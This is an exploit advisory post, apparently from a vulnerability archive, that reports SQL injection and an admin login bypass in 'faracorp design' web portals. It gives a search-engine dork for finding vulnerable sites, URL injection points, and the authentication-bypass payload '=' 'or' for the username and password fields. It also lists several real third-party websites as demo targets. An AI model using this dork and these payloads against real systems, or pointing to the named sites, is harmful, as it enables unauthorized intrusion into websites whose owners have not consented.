faracorp design Sql injection Vulnerability

2016.11.19
Credit: Iranonymous
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

########################## # Exploit Title: faracorp design Sql injection Vulnerability # Google Dork : intext:"طراحی وب سایت و اجرا: پورتال هوشمند" # Date:2016-11-19 # Discovered By: Ormazd # We Are Iranian Anonymous # Home: Iranonymous.org # Version: all # Tested on : Win 10 ########################## ## DP ## hey . we have a security problem in the faracorp design This is a multiple problem of security 1- sql in page course_view.php 2- Admin page bypass #### Poc1 : http://www.Site.com/path/product/[inject here]/.html or http://www.Site.com/path/news/view/[inject here]/.html or http://www.Site.com/path/news/[inject here]/.html ... Demo: http://www.dsteel.ir/products/4/.html http://www.doudmanco.com/portal/news/view/5/.html http://www.vese.ir/news/63/.html #### Poc2: http://site.com/admin # Username : '=' 'or' # Password : '=' 'or' Demo: http://www.dsteel.ir/admin/login.php http://www.vese.ir/admin/login.php http://www.alborzmachineco.com/admin/login.php ############################# #Thanks to : MR.Khatar ||Turk-Khan || Blackwolf_Iran ||ll_azab-siyah_ll ||Sh@d0w ||Hellish_PN || And All Of Iranian Anonymous . # Discovered By: Ormazd


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top